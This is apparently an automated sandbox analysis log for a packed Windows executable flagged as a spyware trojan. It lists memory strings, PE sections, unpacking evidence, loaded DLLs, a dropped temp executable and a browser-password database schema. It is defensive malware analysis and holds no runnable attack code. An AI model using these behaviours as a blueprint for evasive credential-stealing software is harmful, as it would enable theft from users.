Source: file.exe, 00000000.00000003.2238490883.0000000006358000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223655318.000000000630B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218612684.0000000006094000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217729589.00000000062CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2224420371.000000000623B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248094046.0000000006232000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219880350.000000000637A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229371483.0000000006236000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220469866.0000000006232000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235423861.000000000623D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220854134.00000000062E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222228481.00000000063A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223332767.0000000006306000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236003909.000000000634F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216099204.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223531134.0000000006236000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221192080.00000000062E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223012136.00000000063C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229971250.000000000640E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220095626.00000000062F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234932499.0000000006332000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236477132.000000000623D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230931394.0000000006238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222854969.00000000062F4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245593002.0000000006365000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234185301.000000000633E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253092496.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222701181.000000000623B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231984789.000000000642F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234761968.0000000006236000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247217329.00000000064B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233949392.0000000006241000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218720755.0000000006237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247951472.00000000064A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2227764552.0000000006238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2226303572.0000000006313000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233546782.0000000006333000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217588128.000000000623B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2228075555.0000000006318000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221012388.0000000006232000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235648092.0000000006346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223193509.0000000006238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245796475.0000000006233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219660967.0000000006234000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222101490.00000000062F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217284795.0000000006095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2227235680.0000000006320000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253655039.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218976787.0000000006239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253012339.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219771223.00000000062D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253882132.000000000677F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248276802.0000000006362000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229685780.000000000631A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2226766339.0000000006234000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237021186.0000000006353000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222554909.00000000062F8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2225804448.0000000006238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247542612.0000000006232000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223777815.00000000063E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230678876.0000000006331000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249117875.0000000006373000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248745513.0000000006372000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2228816035.0000000006238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220206879.0000000006236000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247779293.0000000006363000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248610827.0000000006238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2241782988.000000000635D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216521225.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218854474.00000000062D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2232378040.0000000006239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246341402.0000000006473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216099204.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2225491096.00000000063DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249299548.0000000006233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234595414.000000000633E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2250268349.0000000006233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219984823.0000000006238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246002360.0000000006353000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216521225.0000000006013000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237982528.000000000635D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238204909.000000000623E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218498494.000000000636C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249856064.00000000064C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221813854.000000000639A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235125286.0000000006440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229030250.000000000631A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253187496.0000000005E28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222398283.0000000006237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245417815.000000000623D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221965348.0000000006233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217485404.000000000609D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248457109.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246558017.000000000623A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235829581.0000000006236000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253479520.0000000005DD4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219088818.00000000062E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253538805.00000000017E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246989087.0000000006370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237583921.000000000623B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234383466.000000000623E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248925777.0000000006232000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245130561.000000000647E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220291424.00000000062EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230324132.0000000006237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2240106789.0000000006236000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217387489.0000000006232000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231440713.000000000632C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ZLIB complexity 0.9981264694357367

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\02FQBW3AYVFKS8DMY3O.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2097251680.0000000005E42000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005D98000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 36%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: zRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe "C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe "C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Section loaded: sspicli.dll	Jump to behavior

Source: file.exe

Static file information: File size 3000320 > 1048576

Source: file.exe

Static PE information: Raw size of wbrzvzgu is bigger than: 0x100000 < 0x2b1200

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.820000.0.unpack :EW;.rsrc :W;.idata :W;wbrzvzgu:EW;gwyfrlto:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wbrzvzgu:EW;gwyfrlto:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	Unpacked PE file: 3.2.02FQBW3AYVFKS8DMY3O.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W;lckjivxs:EW;pqfzdyos:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe	Static PE information: real checksum: 0x2ea059 should be: 0x2e7f27
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: real checksum: 0x2a263f should be: 0x2a418d

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: wbrzvzgu
Source: file.exe	Static PE information: section name: gwyfrlto
Source: file.exe	Static PE information: section name: .taggant
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name:
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name: .idata
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name: lckjivxs
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name: pqfzdyos
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_017FC62A push ss; iretd	0_3_017FC63B
